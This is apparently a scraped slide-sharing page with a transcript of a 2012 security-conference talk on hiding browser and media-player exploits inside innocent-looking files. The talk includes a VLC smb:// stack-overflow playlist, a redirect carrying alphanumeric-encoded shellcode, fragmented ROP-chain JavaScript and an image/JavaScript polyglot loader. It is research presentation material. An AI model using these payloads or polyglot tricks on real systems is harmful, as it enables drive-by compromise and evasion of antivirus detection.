CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 

When Bad Things Come In Good Packages

  • 1. when Bad Things come in Good packages Saumil Shah net-square DEEPSEC 2012
  • 2. # who am i Saumil Shah, CEO Net-Square. •  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. •  M.S. Computer Science Purdue University. •  saumil@net-square.com •  LinkedIn: saumilshah •  Twitter: @therealsaumil net-square
  • 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open" net-square
  • 4. When two forces combine... Web Binary Hacking Exploits net-square
  • 5. SNEAKY LETHAL net-square
  • 7. 302 IMG JS HTML5 net-square
  • 9. VLC smb overflow •  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....} •  Classic Stack Overflow. net-square
  • 10. VLC XSPF file <?xml version="1.0" encoding="UTF-8"?>! <playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>! </playlist>! net-square
  • 11. Alpha Encoded Tiny ZOMFG! Exploit URL net-square
  • 12. 100% Pure Alphanum! net-square
  • 13. VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />! net-square
  • 14. 301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently! X-Powered-By: PHP/5.2.12! Location: smb://example.com@0.0.0.0/foo/ #{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1! JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII! IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL! KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk! PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH! kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn! CUCHPeEPAA}! Content-type: text/html! Content-Length: 0! Connection: close! Server: TinyURL/1.6! net-square
  • 16. Exploits as Images - 1 •  Grayscale encoding (0-255). •  1 pixel = 1 character. •  Perfectly valid image. •  Decode and Execute! net-square
  • 18. I'm an evil Javascript I'm an innocent image net-square
  • 19. function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS> net-square
  • 20. net-square See no eval()
  • 21. Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
  • 22. IMAJS net-square I iz being a Javascript
  • 23. IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script> net-square
  • 24. IMAJS-GIF Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 25. IMAJS-BMP Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 27. Demo IMAJS αq FTW! net-square
  • 28. Alpha encoded exploit code IMAJS CANVAS "loader" script net-square
  • 29. These are not the sploits you're looking for net-square
  • 30. No virus threat detected net-square
  • 32. when Bad Things come in Good packages THE END @therealsaumil saumil@net-square.com net-square